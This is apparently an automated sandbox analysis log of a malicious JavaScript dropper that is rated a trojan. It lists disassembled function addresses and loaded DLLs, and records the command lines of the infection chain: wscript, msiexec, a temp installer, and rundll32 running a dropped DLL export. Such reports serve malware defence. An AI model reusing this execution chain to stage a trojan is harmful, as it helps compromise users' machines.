                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FE84BD4_2_00FE84BD
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FDA5874_2_00FDA587
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FED8D54_2_00FED8D5
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FBC8704_2_00FBC870
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FD49204_2_00FD4920
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FDA9154_2_00FDA915
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FE0A484_2_00FE0A48
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FB9CC04_2_00FB9CC0
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FE5D6D4_2_00FE5D6D
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180055C626_2_0000000180055C62
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180041FEC6_2_0000000180041FEC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CFF86_2_000000018001CFF8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003203C6_2_000000018003203C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800200446_2_0000000180020044
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004C0606_2_000000018004C060
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E0806_2_000000018001E080
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800330886_2_0000000180033088
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F0D06_2_000000018001F0D0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D1046_2_000000018001D104
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002C1686_2_000000018002C168
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800211886_2_0000000180021188
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800241986_2_0000000180024198
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800221A06_2_00000001800221A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800251B06_2_00000001800251B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800231B86_2_00000001800231B8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F1D86_2_000000018001F1D8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E1D86_2_000000018001E1D8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D2606_2_000000018001D260
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E2E06_2_000000018001E2E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F2E06_2_000000018001F2E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003430C6_2_000000018003430C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D3646_2_000000018001D364
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800313886_2_0000000180031388
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002238C6_2_000000018002238C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002539C6_2_000000018002539C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800233A06_2_00000001800233A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800123AC6_2_00000001800123AC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800213B46_2_00000001800213B4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800243C46_2_00000001800243C4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E3E86_2_000000018001E3E8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002E4006_2_000000018002E400
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800324086_2_0000000180032408
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F4486_2_000000018001F448
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D4906_2_000000018001D490
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004249C6_2_000000018004249C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E4F06_2_000000018001E4F0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002C4F86_2_000000018002C4F8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C5006_2_000000018001C500
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004C5106_2_000000018004C510
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F5506_2_000000018001F550
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002E5546_2_000000018002E554
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003356C6_2_000000018003356C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002358C6_2_000000018002358C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D5986_2_000000018001D598
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002159C6_2_000000018002159C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800245AC6_2_00000001800245AC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800225BC6_2_00000001800225BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800255CC6_2_00000001800255CC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C6086_2_000000018001C608
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002B6206_2_000000018002B620
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F6586_2_000000018001F658
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E65C6_2_000000018001E65C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D6A06_2_000000018001D6A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002E6D06_2_000000018002E6D0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C7106_2_000000018001C710
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F7606_2_000000018001F760
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800217846_2_0000000180021784
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800247946_2_0000000180024794
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E7A06_2_000000018001E7A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800227A86_2_00000001800227A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D7A86_2_000000018001D7A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800317BC6_2_00000001800317BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800237BC6_2_00000001800237BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800327EC6_2_00000001800327EC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C81C6_2_000000018001C81C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004A8386_2_000000018004A838
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F8B86_2_000000018001F8B8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E8E46_2_000000018001E8E4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D9006_2_000000018001D900
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002C9046_2_000000018002C904
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C9786_2_000000018001C978
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800229906_2_0000000180022990
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800239A86_2_00000001800239A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800219B06_2_00000001800219B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002B9B46_2_000000018002B9B4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800249C06_2_00000001800249C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F9C06_2_000000018001F9C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DA086_2_000000018001DA08
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EA286_2_000000018001EA28
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180033A3C6_2_0000000180033A3C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CA806_2_000000018001CA80
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FAC86_2_000000018001FAC8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DB106_2_000000018001DB10
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EB586_2_000000018001EB58
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CB886_2_000000018001CB88
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023B946_2_0000000180023B94
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180021B986_2_0000000180021B98
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180024BA86_2_0000000180024BA8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180032BB86_2_0000000180032BB8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180022BBC6_2_0000000180022BBC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FBD06_2_000000018001FBD0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180042BFC6_2_0000000180042BFC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180031C086_2_0000000180031C08
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DC186_2_000000018001DC18
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EC606_2_000000018001EC60
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CC906_2_000000018001CC90
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180046CAC6_2_0000000180046CAC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FD286_2_000000018001FD28
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001ED686_2_000000018001ED68
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DD706_2_000000018001DD70
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180021D846_2_0000000180021D84
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180024D946_2_0000000180024D94
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180022DA46_2_0000000180022DA4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023DC46_2_0000000180023DC4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002BDDC6_2_000000018002BDDC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CDE86_2_000000018001CDE8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FE306_2_000000018001FE30
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EE706_2_000000018001EE70
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DE746_2_000000018001DE74
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180033E986_2_0000000180033E98
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CEF06_2_000000018001CEF0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180044F386_2_0000000180044F38
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FF386_2_000000018001FF38
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DF786_2_000000018001DF78
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180022F8C6_2_0000000180022F8C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180020FA06_2_0000000180020FA0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023FB06_2_0000000180023FB0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180021FB46_2_0000000180021FB4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180024FC46_2_0000000180024FC4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EFC86_2_000000018001EFC8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4B0E31BE6_2_000001FF4B0E31BE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4B0E29EE6_2_000001FF4B0E29EE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000273F807BE6_2_0000000273F807BE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000273F7FFEE6_2_0000000273F7FFEE
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE55C06_2_000001FF4CAE55C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD66C06_2_000001FF4CAD66C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAEBED06_2_000001FF4CAEBED0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF82A06_2_000001FF4CAF82A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE16A06_2_000001FF4CAE16A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE42A06_2_000001FF4CAE42A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF66E06_2_000001FF4CAF66E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF72206_2_000001FF4CAF7220
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAFFBC06_2_000001FF4CAFFBC0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF13A36_2_000001FF4CAF13A3
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF2BB06_2_000001FF4CAF2BB0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB028126_2_000001FF4CB02812
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAECBE06_2_000001FF4CAECBE0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB01F406_2_000001FF4CB01F40
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CADA7306_2_000001FF4CADA730
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB02F606_2_000001FF4CB02F60
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD95006_2_000001FF4CAD9500
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAEA1006_2_000001FF4CAEA100
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAEB4E06_2_000001FF4CAEB4E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB014906_2_000001FF4CB01490
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD99D06_2_000001FF4CAD99D0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE4DB06_2_000001FF4CAE4DB0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CB002106_2_000001FF4CB00210
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAFB5E06_2_000001FF4CAFB5E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF55E06_2_000001FF4CAF55E0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAF45506_2_000001FF4CAF4550
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAE91206_2_000001FF4CAE9120
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FF4CAD5D606_2_000001FF4CAD5D60
                  Source: C:\Windows\explorer.exeCode function: 8_2_030521648_2_03052164
                  Source: C:\Windows\explorer.exeCode function: 8_2_03051A7C8_2_03051A7C
                  Source: C:\Windows\explorer.exeCode function: 8_2_03051A8C8_2_03051A8C
                  Source: C:\Windows\System32\rundll32.exeCode function: String function: 000000018004816C appears 44 times
                  Source: C:\Windows\System32\rundll32.exeCode function: String function: 0000000180001400 appears 56 times
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: String function: 00FD3790 appears 39 times
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: String function: 00FD325F appears 103 times
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: String function: 00FD3292 appears 70 times
                  Source: Document-18-33-08.jsInitial sample: Strings found which are bigger than 50
                  Source: classification engineClassification label: mal100.spre.troj.evad.winJS@10/21@8/4
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FB3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,4_2_00FB3860
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FB4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,4_2_00FB4BA0
                  Source: C:\Windows\Installer\MSIF29D.tmpCode function: 4_2_00FB45B0 LoadResource,LockResource,SizeofResource,4_2_00FB45B0
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLF268.tmpJump to behavior
                  Source: C:\Windows\System32\rundll32.exeMutant created: NULL
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF93ACB531B807E54B.TMPJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js"
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF29D.tmp "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF29D.tmp "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCStateJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCStateJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCStateJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Installer\MSIF29D.tmpSection loaded: apphelp.dllJump to behavior
